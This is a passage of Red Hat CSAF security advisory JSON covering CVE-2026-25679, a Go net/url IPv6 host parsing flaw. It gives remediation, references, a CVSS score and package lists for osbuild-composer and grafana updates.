"AppStream-9.7.0.Z.MAIN:osbuild-composer-core-0:149-5.el9_7.x86_64", "AppStream-9.7.0.Z.MAIN:osbuild-composer-core-debuginfo-0:149-5.el9_7.aarch64", "AppStream-9.7.0.Z.MAIN:osbuild-composer-core-debuginfo-0:149-5.el9_7.ppc64le", "AppStream-9.7.0.Z.MAIN:osbuild-composer-core-debuginfo-0:149-5.el9_7.s390x", "AppStream-9.7.0.Z.MAIN:osbuild-composer-core-debuginfo-0:149-5.el9_7.x86_64", "AppStream-9.7.0.Z.MAIN:osbuild-composer-debuginfo-0:149-5.el9_7.aarch64", "AppStream-9.7.0.Z.MAIN:osbuild-composer-debuginfo-0:149-5.el9_7.ppc64le", "AppStream-9.7.0.Z.MAIN:osbuild-composer-debuginfo-0:149-5.el9_7.s390x", "AppStream-9.7.0.Z.MAIN:osbuild-composer-debuginfo-0:149-5.el9_7.x86_64", "AppStream-9.7.0.Z.MAIN:osbuild-composer-debugsource-0:149-5.el9_7.aarch64", "AppStream-9.7.0.Z.MAIN:osbuild-composer-debugsource-0:149-5.el9_7.ppc64le", "AppStream-9.7.0.Z.MAIN:osbuild-composer-debugsource-0:149-5.el9_7.s390x", "AppStream-9.7.0.Z.MAIN:osbuild-composer-debugsource-0:149-5.el9_7.x86_64", "AppStream-9.7.0.Z.MAIN:osbuild-composer-tests-debuginfo-0:149-5.el9_7.aarch64", "AppStream-9.7.0.Z.MAIN:osbuild-composer-tests-debuginfo-0:149-5.el9_7.ppc64le", "AppStream-9.7.0.Z.MAIN:osbuild-composer-tests-debuginfo-0:149-5.el9_7.s390x", "AppStream-9.7.0.Z.MAIN:osbuild-composer-tests-debuginfo-0:149-5.el9_7.x86_64", "AppStream-9.7.0.Z.MAIN:osbuild-composer-worker-0:149-5.el9_7.aarch64", "AppStream-9.7.0.Z.MAIN:osbuild-composer-worker-0:149-5.el9_7.ppc64le", "AppStream-9.7.0.Z.MAIN:osbuild-composer-worker-0:149-5.el9_7.s390x", "AppStream-9.7.0.Z.MAIN:osbuild-composer-worker-0:149-5.el9_7.x86_64", "AppStream-9.7.0.Z.MAIN:osbuild-composer-worker-debuginfo-0:149-5.el9_7.aarch64", "AppStream-9.7.0.Z.MAIN:osbuild-composer-worker-debuginfo-0:149-5.el9_7.ppc64le", "AppStream-9.7.0.Z.MAIN:osbuild-composer-worker-debuginfo-0:149-5.el9_7.s390x", "AppStream-9.7.0.Z.MAIN:osbuild-composer-worker-debuginfo-0:149-5.el9_7.x86_64"]}, "references": [{"category": "self", "summary": "Canonical URL", "url": "https://access.redhat.com/security/cve/CVE-2026-25679"}, {"category": "external", "summary": "RHBZ#2445356", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2445356"}, {"category": "external", "summary": "https://www.cve.org/CVERecord?id=CVE-2026-25679", "url": "https://www.cve.org/CVERecord?id=CVE-2026-25679"}, {"category": "external", "summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-25679", "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-25679"}, {"category": "external", "summary": "https://go.dev/cl/752180", "url": "https://go.dev/cl/752180"}, {"category": "external", "summary": "https://go.dev/issue/77578", "url": "https://go.dev/issue/77578"}, {"category": "external", "summary": "https://groups.google.com/g/golang-announce/c/EdhZqrQ98hk", "url": "https://groups.google.com/g/golang-announce/c/EdhZqrQ98hk"}, {"category": "external", "summary": "https://pkg.go.dev/vuln/GO-2026-4601", "url": "https://pkg.go.dev/vuln/GO-2026-4601"}], "release_date": "2026-03-06T21:28:14.211000+00:00", "remediations": [{"category": "vendor_fix", "date": "2026-04-20T14:26:01+00:00", "details": "For details on how to apply this update, which includes the changes described in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258", "product_ids": ["AppStream-9.7.0.Z.MAIN:osbuild-composer-0:149-5.el9_7.aarch64", "AppStream-9.7.0.Z.MAIN:osbuild-composer-0:149-5.el9_7.ppc64le", "AppStream-9.7.0.Z.MAIN:osbuild-composer-0:149-5.el9_7.s390x", "AppStream-9.7.0.Z.MAIN:osbuild-composer-0:149-5.el9_7.src", "AppStream-9.7.0.Z.MAIN:osbuild-composer-0:149-5.el9_7.x86_64", "AppStream-9.7.0.Z.MAIN:osbuild-composer-core-0:149-5.el9_7.aarch64", "AppStream-9.7.0.Z.MAIN:osbuild-composer-core-0:149-5.el9_7.ppc64le", "AppStream-9.7.0.Z.MAIN:osbuild-composer-core-0:149-5.el9_7.s390x", "AppStream-9.7.0.Z.MAIN:osbuild-composer-core-0:149-5.el9_7.x86_64", "AppStream-9.7.0.Z.MAIN:osbuild-composer-core-debuginfo-0:149-5.el9_7.aarch64", "AppStream-9.7.0.Z.MAIN:osbuild-composer-core-debuginfo-0:149-5.el9_7.ppc64le", "AppStream-9.7.0.Z.MAIN:osbuild-composer-core-debuginfo-0:149-5.el9_7.s390x", "AppStream-9.7.0.Z.MAIN:osbuild-composer-core-debuginfo-0:149-5.el9_7.x86_64", "AppStream-9.7.0.Z.MAIN:osbuild-composer-debuginfo-0:149-5.el9_7.aarch64", "AppStream-9.7.0.Z.MAIN:osbuild-composer-debuginfo-0:149-5.el9_7.ppc64le", "AppStream-9.7.0.Z.MAIN:osbuild-composer-debuginfo-0:149-5.el9_7.s390x", "AppStream-9.7.0.Z.MAIN:osbuild-composer-debuginfo-0:149-5.el9_7.x86_64", "AppStream-9.7.0.Z.MAIN:osbuild-composer-debugsource-0:149-5.el9_7.aarch64", "AppStream-9.7.0.Z.MAIN:osbuild-composer-debugsource-0:149-5.el9_7.ppc64le", "AppStream-9.7.0.Z.MAIN:osbuild-composer-debugsource-0:149-5.el9_7.s390x", "AppStream-9.7.0.Z.MAIN:osbuild-composer-debugsource-0:149-5.el9_7.x86_64", "AppStream-9.7.0.Z.MAIN:osbuild-composer-tests-debuginfo-0:149-5.el9_7.aarch64", "AppStream-9.7.0.Z.MAIN:osbuild-composer-tests-debuginfo-0:149-5.el9_7.ppc64le", "AppStream-9.7.0.Z.MAIN:osbuild-composer-tests-debuginfo-0:149-5.el9_7.s390x", "AppStream-9.7.0.Z.MAIN:osbuild-composer-tests-debuginfo-0:149-5.el9_7.x86_64", "AppStream-9.7.0.Z.MAIN:osbuild-composer-worker-0:149-5.el9_7.aarch64", "AppStream-9.7.0.Z.MAIN:osbuild-composer-worker-0:149-5.el9_7.ppc64le", "AppStream-9.7.0.Z.MAIN:osbuild-composer-worker-0:149-5.el9_7.s390x", "AppStream-9.7.0.Z.MAIN:osbuild-composer-worker-0:149-5.el9_7.x86_64", "AppStream-9.7.0.Z.MAIN:osbuild-composer-worker-debuginfo-0:149-5.el9_7.aarch64", "AppStream-9.7.0.Z.MAIN:osbuild-composer-worker-debuginfo-0:149-5.el9_7.ppc64le", "AppStream-9.7.0.Z.MAIN:osbuild-composer-worker-debuginfo-0:149-5.el9_7.s390x", "AppStream-9.7.0.Z.MAIN:osbuild-composer-worker-debuginfo-0:149-5.el9_7.x86_64"], "restart_required": {"category": "none"}, "url": "https://access.redhat.com/errata/RHSA-2026:9044"}, {"category": "workaround", "details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.", "product_ids": ["AppStream-9.7.0.Z.MAIN:osbuild-composer-0:149-5.el9_7.aarch64", "AppStream-9.7.0.Z.MAIN:osbuild-composer-0:149-5.el9_7.ppc64le", "AppStream-9.7.0.Z.MAIN:osbuild-composer-0:149-5.el9_7.s390x", "AppStream-9.7.0.Z.MAIN:osbuild-composer-0:149-5.el9_7.src", "AppStream-9.7.0.Z.MAIN:osbuild-composer-0:149-5.el9_7.x86_64", "AppStream-9.7.0.Z.MAIN:osbuild-composer-core-0:149-5.el9_7.aarch64", "AppStream-9.7.0.Z.MAIN:osbuild-composer-core-0:149-5.el9_7.ppc64le", "AppStream-9.7.0.Z.MAIN:osbuild-composer-core-0:149-5.el9_7.s390x", "AppStream-9.7.0.Z.MAIN:osbuild-composer-core-0:149-5.el9_7.x86_64", "AppStream-9.7.0.Z.MAIN:osbuild-composer-core-debuginfo-0:149-5.el9_7.aarch64", "AppStream-9.7.0.Z.MAIN:osbuild-composer-core-debuginfo-0:149-5.el9_7.ppc64le", "AppStream-9.7.0.Z.MAIN:osbuild-composer-core-debuginfo-0:149-5.el9_7.s390x", "AppStream-9.7.0.Z.MAIN:osbuild-composer-core-debuginfo-0:149-5.el9_7.x86_64", "AppStream-9.7.0.Z.MAIN:osbuild-composer-debuginfo-0:149-5.el9_7.aarch64", "AppStream-9.7.0.Z.MAIN:osbuild-composer-debuginfo-0:149-5.el9_7.ppc64le", "AppStream-9.7.0.Z.MAIN:osbuild-composer-debuginfo-0:149-5.el9_7.s390x", "AppStream-9.7.0.Z.MAIN:osbuild-composer-debuginfo-0:149-5.el9_7.x86_64", "AppStream-9.7.0.Z.MAIN:osbuild-composer-debugsource-0:149-5.el9_7.aarch64", "AppStream-9.7.0.Z.MAIN:osbuild-composer-debugsource-0:149-5.el9_7.ppc64le", "AppStream-9.7.0.Z.MAIN:osbuild-composer-debugsource-0:149-5.el9_7.s390x", "AppStream-9.7.0.Z.MAIN:osbuild-composer-debugsource-0:149-5.el9_7.x86_64", "AppStream-9.7.0.Z.MAIN:osbuild-composer-tests-debuginfo-0:149-5.el9_7.aarch64", "AppStream-9.7.0.Z.MAIN:osbuild-composer-tests-debuginfo-0:149-5.el9_7.ppc64le", "AppStream-9.7.0.Z.MAIN:osbuild-composer-tests-debuginfo-0:149-5.el9_7.s390x", "AppStream-9.7.0.Z.MAIN:osbuild-composer-tests-debuginfo-0:149-5.el9_7.x86_64", "AppStream-9.7.0.Z.MAIN:osbuild-composer-worker-0:149-5.el9_7.aarch64", "AppStream-9.7.0.Z.MAIN:osbuild-composer-worker-0:149-5.el9_7.ppc64le", "AppStream-9.7.0.Z.MAIN:osbuild-composer-worker-0:149-5.el9_7.s390x", "AppStream-9.7.0.Z.MAIN:osbuild-composer-worker-0:149-5.el9_7.x86_64", "AppStream-9.7.0.Z.MAIN:osbuild-composer-worker-debuginfo-0:149-5.el9_7.aarch64", "AppStream-9.7.0.Z.MAIN:osbuild-composer-worker-debuginfo-0:149-5.el9_7.ppc64le", "AppStream-9.7.0.Z.MAIN:osbuild-composer-worker-debuginfo-0:149-5.el9_7.s390x", "AppStream-9.7.0.Z.MAIN:osbuild-composer-worker-debuginfo-0:149-5.el9_7.x86_64"]}], "scores": [{"cvss_v3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1"}, "products": ["AppStream-9.7.0.Z.MAIN:osbuild-composer-0:149-5.el9_7.aarch64", "AppStream-9.7.0.Z.MAIN:osbuild-composer-0:149-5.el9_7.ppc64le", "AppStream-9.7.0.Z.MAIN:osbuild-composer-0:149-5.el9_7.s390x", "AppStream-9.7.0.Z.MAIN:osbuild-composer-0:149-5.el9_7.src", "AppStream-9.7.0.Z.MAIN:osbuild-composer-0:149-5.el9_7.x86_64", "AppStream-9.7.0.Z.MAIN:osbuild-composer-core-0:149-5.el9_7.aarch64", "AppStream-9.7.0.Z.MAIN:osbuild-composer-core-0:149-5.el9_7.ppc64le", "AppStream-9.7.0.Z.MAIN:osbuild-composer-core-0:149-5.el9_7.s390x", "AppStream-9.7.0.Z.MAIN:osbuild-composer-core-0:149-5.el9_7.x86_64", "AppStream-9.7.0.Z.MAIN:osbuild-composer-core-debuginfo-0:149-5.el9_7.aarch64", "AppStream-9.7.0.Z.MAIN:osbuild-composer-core-debuginfo-0:149-5.el9_7.ppc64le", "AppStream-9.7.0.Z.MAIN:osbuild-composer-core-debuginfo-0:149-5.el9_7.s390x", "AppStream-9.7.0.Z.MAIN:osbuild-composer-core-debuginfo-0:149-5.el9_7.x86_64", "AppStream-9.7.0.Z.MAIN:osbuild-composer-debuginfo-0:149-5.el9_7.aarch64", "AppStream-9.7.0.Z.MAIN:osbuild-composer-debuginfo-0:149-5.el9_7.ppc64le", "AppStream-9.7.0.Z.MAIN:osbuild-composer-debuginfo-0:149-5.el9_7.s390x", "AppStream-9.7.0.Z.MAIN:osbuild-composer-debuginfo-0:149-5.el9_7.x86_64", "AppStream-9.7.0.Z.MAIN:osbuild-composer-debugsource-0:149-5.el9_7.aarch64", "AppStream-9.7.0.Z.MAIN:osbuild-composer-debugsource-0:149-5.el9_7.ppc64le", "AppStream-9.7.0.Z.MAIN:osbuild-composer-debugsource-0:149-5.el9_7.s390x", "AppStream-9.7.0.Z.MAIN:osbuild-composer-debugsource-0:149-5.el9_7.x86_64", "AppStream-9.7.0.Z.MAIN:osbuild-composer-tests-debuginfo-0:149-5.el9_7.aarch64", "AppStream-9.7.0.Z.MAIN:osbuild-composer-tests-debuginfo-0:149-5.el9_7.ppc64le", "AppStream-9.7.0.Z.MAIN:osbuild-composer-tests-debuginfo-0:149-5.el9_7.s390x", "AppStream-9.7.0.Z.MAIN:osbuild-composer-tests-debuginfo-0:149-5.el9_7.x86_64", "AppStream-9.7.0.Z.MAIN:osbuild-composer-worker-0:149-5.el9_7.aarch64", "AppStream-9.7.0.Z.MAIN:osbuild-composer-worker-0:149-5.el9_7.ppc64le", "AppStream-9.7.0.Z.MAIN:osbuild-composer-worker-0:149-5.el9_7.s390x", "AppStream-9.7.0.Z.MAIN:osbuild-composer-worker-0:149-5.el9_7.x86_64", "AppStream-9.7.0.Z.MAIN:osbuild-composer-worker-debuginfo-0:149-5.el9_7.aarch64", "AppStream-9.7.0.Z.MAIN:osbuild-composer-worker-debuginfo-0:149-5.el9_7.ppc64le", "AppStream-9.7.0.Z.MAIN:osbuild-composer-worker-debuginfo-0:149-5.el9_7.s390x", "AppStream-9.7.0.Z.MAIN:osbuild-composer-worker-debuginfo-0:149-5.el9_7.x86_64"]}], "threats": [{"category": "impact", "details": "Important"}], "title": "net/url: Incorrect parsing of IPv6 host literals in net/url"}], "containers": {"cna": {"x_gcve": [{"recordType": "advisory", "vulnId": "rhsa-2026:9044"}]}}}, {"document": {"aggregate_severity": {"namespace": "https://access.redhat.com/security/updates/classification/", "text": "Important"}, "category": "csaf_security_advisory", "csaf_version": "2.0", "distribution": {"text": "Copyright \u00a9 Red Hat, Inc. All rights reserved.", "tlp": {"label": "WHITE", "url": "https://www.first.org/tlp/"}}, "lang": "en", "notes": [{"category": "summary", "text": "An update for grafana is now available for Red Hat Enterprise Linux 10.0 Extended Update Support.\n\nRed Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.", "title": "Topic"}, {"category": "general", "text": "Grafana is an open source, feature rich metrics dashboard and graph editor for Graphite, InfluxDB & OpenTSDB. \n\nSecurity Fix(es):\n\n* net/url: Incorrect parsing of IPv6 host literals in net/url (CVE-2026-25679)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.", "title": "Details"}, {"category": "legal_disclaimer", "text": "This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.", "title": "Terms of Use"}], "publisher": {"category": "vendor", "contact_details": "https://access.redhat.com/security/team/contact/", "issuing_authority": "Red Hat Product Security is responsible for vulnerability handling across all Red Hat products and services.", "name": "Red Hat Product Security", "namespace": "https://www.redhat.com"}, "references": [{"category": "self", "summary": "https://access.redhat.com/errata/RHSA-2026:8849", "url": "https://access.redhat.com/errata/RHSA-2026:8849"}, {"category": "external", "summary": "https://access.redhat.com/security/updates/classification/#important", "url": "https://access.redhat.com/security/updates/classification/#important"}, {"category": "external", "summary": "2445356", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2445356"}, {"category": "self", "summary": "Canonical URL", "url": "https://security.access.redhat.com/data/csaf/v2/advisories/2026/rhsa-2026_8849.json"}], "title": "Red Hat Security Advisory: grafana security update", "tracking": {"current_release_date": "2026-06-08T15:52:49+00:00", "generator": {"date": "2026-06-08T15:52:49+00:00", "engine": {"name": "Red Hat SDEngine", "version": "4.8.2"}}, "id": "RHSA-2026:8849", "initial_release_date": "2026-04-20T01:29:04+00:00", "revision_history": [{"date": "2026-04-20T01:29:04+00:00", "number": "1", "summary": "Initial version"}, {"date": "2026-04-20T01:29:04+00:00", "number": "2", "summary": "Last updated version"}, {"date": "2026-06-08T15:52:49+00:00", "number": "3", "summary": "Last generated version"}], "status": "final", "version": "3"}}, "product_tree": {"branches": [{"branches": [{"branches": [{"category": "product_name", "name": "Red Hat Enterprise Linux AppStream EUS (v. 10.0)", "product": {"name": "Red Hat Enterprise Linux AppStream EUS (v. 10.0)", "product_id": "AppStream-10.0.Z.E2S", "product_identification_helper": {"cpe": "cpe:/o:redhat:enterprise_linux_eus:10.0"}}}], "category": "product_family", "name": "Red Hat Enterprise Linux"}, {"branches": [{"category": "product_version", "name": "grafana-0:10.2.6-22.el10_0.src", "product": {"name": "grafana-0:10.2.6-22.el10_0.src", "product_id": "grafana-0:10.2.6-22.el10_0.src", "product_identification_helper": {"purl": "pkg:rpm/redhat/grafana@10.2.6-22.el10_0?arch=src"}}}], "category": "architecture", "name": "src"}, {"branches": [{"category": "product_version", "name": "grafana-0:10.2.6-22.el10_0.aarch64", "product": {"name": "grafana-0:10.2.6-22.el10_0.aarch64", "product_id": "grafana-0:10.2.6-22.el10_0.aarch64", "product_identification_helper": {"purl": "pkg:rpm/redhat/grafana@10.2.6-22.el10_0?arch=aarch64"}}}, {"category": "product_version", "name": "grafana-selinux-0:10.2.6-22.el10_0.aarch64", "product": {"name": "grafana-selinux-0:10.2.6-22.el10_0.aarch64", "product_id": "grafana-selinux-0:10.2.6-22.el10_0.aarch64", "product_identification_helper": {"purl": "pkg:rpm/redhat/grafana-selinux@10.2.6-22.el10_0?arch=aarch64"}}}, {"category": "product_version", "name": "grafana-debugsource-0:10.2.6-22.el10_0.aarch64", "product": {"name": "grafana-debugsource-0:10.2.6-22.el10_0.aarch64", "product_id": "grafana-debugsource-0:10.2.6-22.el10_0.aarch64", "product_identification_helper": {"purl": "pkg:rpm/redhat/grafana-debugsource@10.2.6-22.el10_0?arch=aarch64"}}}, {"category": "product_version", "name": "grafana-debuginfo-0:10.2.6-22.el10_0.aarch64", "product": {"name": "grafana-debuginfo-0:10.2.6-22.el10_0.aarch64", "product_id": "grafana-debuginfo-0:10.2.6-22.el10_0.aarch64", "product_identification_helper": {"purl": "pkg:rpm/redhat/grafana-debuginfo@10.2.6-22.el10_0?arch=aarch64"}}}], "category": "architecture", "name": "aarch64"}, {"branches": [{"category": "product_version", "name": "grafana-0:10.2.6-22.el10_0.ppc64le", "product": {"name": "grafana-0:10.2.6-22.el10_0.ppc64le", "product_id": "grafana-0:10.2.6-22.el10_0.ppc64le", "product_identification_helper": {"purl": "pkg:rpm/redhat/grafana@10.2.6-22.el10_0?arch=ppc64le"}}}, {"category": "product_version", "name": "grafana-selinux-0:10.2.6-22.el10_0.ppc64le", "product": {"name": "grafana-selinux-0:10.2.6-22.el10_0.ppc64le", "product_id": "grafana-selinux-0:10.2.6-22.el10_0.ppc64le", "product_identification_helper": {"purl": "pkg:rpm/redhat/grafana-selinux@10.2.6-22.el10_0?arch=ppc64le"}}}, {"category": "product_version", "name": "grafana-debugsource-0:10.2.6-22.el10_0.ppc64le", "product": {"name": "grafana-debugsource-0:10.2.6-22.el10_0.ppc64le", "product_id": "grafana-debugsource-0:10.2.6-22.el10_0.ppc64le", "product_identification_helper": {"purl": "pkg:rpm/redhat/grafana-debugsource@10.2.6-22.el10_0?arch=ppc64le"}}}, {"category": "product_version", "name": "grafana-debuginfo-0:10.2.6-22.el10_0.ppc64le", "product": {"name": "grafana-debuginfo-0:10.2.6-22.el10_0.ppc64le", "product_id": "grafana-debuginfo-0:10.2.6-22.el10_0.ppc64le", "product_identification_helper": {"purl": "pkg:rpm/redhat/grafana-debuginfo@10.2.6-22.el10_0?arch=ppc64le"}}}], "category": "architecture", "name": "ppc64le"}, {"branches": [{"category": "product_version", "name": "grafana-0:10.2.6-22.el10_0.s390x", "product": {"name": "grafana-0:10.2.6-22.el10_0.s390x", "product_id": "grafana-0:10.2.6-22.el10_0.s390x", "product_identification_helper": {"purl": "pkg:rpm/redhat/grafana@10.2.6-22.el10_0?arch=s390x"}}}, {"category": "product_version", "name": "grafana-selinux-0:10.2.6-22.el10_0.s390x", "product": {"name": "grafana-selinux-0:10.2.6-22.el10_0.s390x", "product_id": "grafana-selinux-0:10.2.6-22.el10_0.s390x", "product_identification_helper": {"purl": "pkg:rpm/redhat/grafana-selinux@10.2.6-22.el10_0?arch=s390x"}}}, {"category": "product_version", "name": "grafana-debugsource-0:10.2.6-22.el10_0.s390x", "product": {"name": "grafana-debugsource-0:10.2.6-22.el10_0.s390x", "product_id": "grafana-debugsource-0:10.2.6-22.el10_0.s390x", "product_identification_helper": {"purl": "pkg:rpm/redhat/grafana-debugsource@10.2.6-22.el10_0?arch=s390x"}}}, {"category": "product_version", "name": "grafana-debuginfo-0:10.2.6-22.el10_0.s390x", "product": {"name": "grafana-debuginfo-0:10.2.6-22.el10_0.s390x", "product_id": "grafana-debuginfo-0:10.2.6-22.el10_0.s390x", "product_identification_helper": {"purl": "pkg:rpm/redhat/grafana-debuginfo@10.2.6-22.el10_0?arch=s390x"}}}], "category": "architecture", "name": "s390x"}, {"branches": [{"category": "product_version", "name": "grafana-0:10.2.6-22.el10_0.x86_64", "product": {"name": "grafana-0:10.2.6-22.el10_0.x86_64", "product_id": "grafana-0:10.2.6-22.el10_0.x86_64", "product_identification_helper": {"purl": "pkg:rpm/redhat/grafana@10.2.6-22.el10_0?arch=x86_64"}}}, {"category": "product_version", "name": "grafana-selinux-0:10.2.6-22.el10_0.x86_64", "product": {"name": "grafana-selinux-0:10.2.6-22.el10_0.x86_64", "product_id": "grafana-selinux-0:10.2.6-22.el10_0.x86_64", "product_identification_helper": {"purl": "pkg:rpm/redhat/grafana-selinux@10.2.6-22.el10_0?arch=x86_64"}}}, {"category": "product_version", "name": "grafana-debugsource-0:10.2.6-22.el10_0.x86_64", "product": {"name": "grafana-debugsource-0:10.2.6-22.el10_0.x86_64", "product_id": "grafana-debugsource-0:10.2.6-22.el10_0.x86_64", "product_identification_helper": {"purl": "pkg:rpm/redhat/grafana-debugsource@10.2.6-22.el10_0?arch=x86_64"}}}, {"category": "product_version", "name": "grafana-debuginfo-0:10.2.6-22.el10_0.x86_64", "product": {"name": "grafana-debuginfo-0:10.2.6-22.el10_0.x86_64", "product_id": "grafana-debuginfo-0:10.2.6-22.el10_0.x86_64", "product_identification_helper": {"purl": "pkg:rpm/redhat/grafana-debuginfo@10.2.6-22.el10_0?arch=x86_64"}}}], "category": "architecture", "name": "x86_64"}], "category": "vendor", "name": "Red Hat"}], "relationships": [{"category": "default_component_of", "full_product_name": {"name": "grafana-0:10.2.6-22.el10_0.aarch64 as a component of Red Hat Enterprise Linux AppStream EUS (v. 10.0)", "product_id": "AppStream-10.0.Z.E2S:grafana-0:10.2.6-22.el10_0.aarch64"}, "product_reference": "grafana-0:10.2.6-22.el10_0.aarch64", "relates_to_product_reference": "AppStream-10.0.Z.E2S"}, {"category": "default_component_of", "full_product_name": {"name": "grafana-0:10.2.6-22.el10_0.ppc64le as a component of Red Hat Enterprise Linux AppStream EUS (v. 10.0)", "product_id": "AppStream-10.0.Z.E2S:grafana-0:10.2.6-22.el10_0.ppc64le"}, "product_reference": "grafana-0:10.2.6-22.el10_0.ppc64le", "relates_to_product_reference": "AppStream-10.0.Z.E2S"}, {"category": "default_component_of", "full_product_name": {"name": "grafana-0:10.2.6-22.el10_0.s390x as a component of Red Hat Enterprise Linux AppStream EUS (v. 10.0)", "product_id": "AppStream-10.0.Z.E2S:grafana-0:10.2.6-22.el10_0.s390x"}, "product_reference": "grafana-0:10.2.6-22.el10_0.s390x", "relates_to_product_reference": "AppStream-10.0.Z.E2S"}, {"category": "default_component_of", "full_product_name": {"name": "grafana-0:10.2.6-22.el10_0.src as a component of Red Hat Enterprise Linux AppStream EUS (v. 10.0)", "product_id": "AppStream-10.0.Z.E2S:grafana-0:10.2.6-22.el10_0.src"}, "product_reference": "grafana-0:10.2.6-22.el10_0.src", "relates_to_product_reference": "AppStream-10.0.Z.E2S"}, {"category": "default_component_of", "full_product_name": {"name": "grafana-0:10.2.6-22.el10_0.x86_64 as a component of Red Hat Enterprise Linux AppStream EUS (v. 10.0)", "product_id": "AppStream-10.0.Z.E2S:grafana-0:10.2.6-22.el10_0.x86_64"}, "product_reference": "grafana-0:10.2.6-22.el10_0.x86_64", "relates_to_product_reference": "AppStream-10.0.Z.E2S"}, {"category": "default_component_of", "full_product_name": {"name": "grafana-debuginfo-0:10.2.6-22.el10_0.aarch64 as a component of Red Hat Enterprise Linux AppStream EUS (v. 10.0)", "product_id": "AppStream-10.0.Z.E2S:grafana-debuginfo-0:10.2.6-22.el10_0.aarch64"}, "product_reference": "grafana-debuginfo-0:10.2.6-22.el10_0.aarch64", "relates_to_product_reference": "AppStream-10.0.Z.E2S"}, {"category": "default_component_of", "full_product_name": {"name": "grafana-debuginfo-0:10.2.6-22.el10_0.ppc64le as a component of Red Hat Enterprise Linux AppStream EUS (v. 10.0)", "product_id": "AppStream-10.0.Z.E2S:grafana-debuginfo-0:10.2.6-22.el10_0.ppc64le"}, "product_reference": "grafana-debuginfo-0:10.2.6-22.el10_0.ppc64le", "relates_to_product_reference": "AppStream-10.0.Z.E2S"}, {"category": "default_component_of", "full_product_name": {"name": "grafana-debuginfo-0:10.2.6-22.el10_0.s390x as a component of Red Hat Enterprise Linux AppStream EUS (v. 10.0)", "product_id": "AppStream-10.0.Z.E2S:grafana-debuginfo-0:10.2.6-22.el10_0.s390x"}, "product_reference": "grafana-debuginfo-0:10.2.6-22.el10_0.s390x", "relates_to_product_reference": "AppStream-10.0.Z.E2S"}, {"category": "default_component_of", "full_product_name": {"name": "grafana-debuginfo-0:10.2.6-22.el10_0.x86_64 as a component of Red Hat Enterprise Linux AppStream EUS (v. 10.0)", "product_id": "AppStream-10.0.Z.E2S:grafana-debuginfo-0:10.2.6-22.el10_0.x86_64"}, "product_reference": "grafana-debuginfo-0:10.2.6-22.el10_0.x86_64", "relates_to_product_reference": "AppStream-10.0.Z.E2S"}, {"category": "default_component_of", "full_product_name": {"name": "grafana-debugsource-0:10.2.6-22.el10_0.aarch64 as a component of Red Hat Enterprise Linux AppStream EUS (v. 10.0)", "product_id": "AppStream-10.0.Z.E2S:grafana-debugsource-0:10.2.6-22.el10_0.aarch64"}, "product_reference": "grafana-debugsource-0:10.2.6-22.el10_0.aarch64", "relates_to_product_reference": "AppStream-10.0.Z.E2S"}, {"category": "default_component_of", "full_product_name": {"name": "grafana-debugsource-0:10.2.6-22.el10_0.ppc64le as a component of Red Hat Enterprise Linux AppStream EUS (v. 10.0)", "product_id": "AppStream-10.0.Z.E2S:grafana-debugsource-0:10.2.6-22.el10_0.ppc64le"}, "product_reference": "grafana-debugsource-0:10.2.6-22.el10_0.ppc64le", "relates_to_product_reference": "AppStream-10.0.Z.E2S"}, {"category": "default_component_of", "full_product_name": {"name": "grafana-debugsource-0:10.2.6-22.el10_0.s390x as a component of Red Hat Enterprise Linux AppStream EUS (v. 10.0)", "product_id": "AppStream-10.0.Z.E2S:grafana-debugsource-0:10.2.6-22.el10_0.s390x"}, "product_reference": "grafana-debugsource-0:10.2.6-22.el10_0.s390x", "relates_to_product_reference": "AppStream-10.0.Z.E2S"}, {"category": "default_component_of", "full_product_name": {"name": "grafana-debugsource-0:10.2.6-22.el10_0.x86_64 as a component of Red Hat Enterprise Linux AppStream EUS (v. 10.0)", "product_id": "AppStream-10.0.Z.E2S:grafana-debugsource-0:10.2.6-22.el10_0.x86_64"}, "product_reference": "grafana-debugsource-0:10.2.6-22.el10_0.x86_64", "relates_to_product_reference": "AppStream-10.0.Z.E2S"}, {"category": "default_component_of", "full_product_name": {"name": "grafana-selinux-0:10.2.6-22.el10_0.aarch64 as a component of Red Hat Enterprise Linux AppStream EUS (v. 10.0)", "product_id": "AppStream-10.0.Z.E2S:grafana-selinux-0:10.2.6-22.el10_0.aarch64"}, "product_reference": "grafana-selinux-0:10.2.6-22.el10_0.aarch64", "relates_to_product_reference": "AppStream-10.0.Z.E2S"}, {"category": "default_component_of", "full_product_name": {"name": "grafana-selinux-0:10.2.6-22.el10_0.ppc64le as a component of Red Hat Enterprise Linux AppStream EUS (v. 10.0)", "product_id": "AppStream-10.0.Z.E2S:grafana-selinux-0:10.2.6-22.el10_0.ppc64le"}, "product_reference": "grafana-selinux-0:10.2.6-22.el10_0.ppc64le", "relates_to_product_reference": "AppStream-10.0.Z.E2S"}, {"category": "default_component_of", "full_product_name": {"name": "grafana-selinux-0:10.2.6-22.el10_0.s390x as a component of Red Hat Enterprise Linux AppStream EUS (v. 10.0)", "product_id": "AppStream-10.0.Z.E2S:grafana-selinux-0:10.2.6-22.el10_0.s390x"}, "product_reference": "grafana-selinux-0:10.2.6-22.el10_0.s390x", "relates_to_product_reference": "AppStream-10.0.Z.E2S"}, {"category": "default_component_of", "full_product_name": {"name": "grafana-selinux-0:10.2.6-22.el10_0.x86_64 as a component of Red Hat Enterprise Linux AppStream EUS (v. 10.0)", "product_id": "AppStream-10.0.Z.E2S:grafana-selinux-0:10.2.6-22.el10_0.x86_64"}, "product_reference": 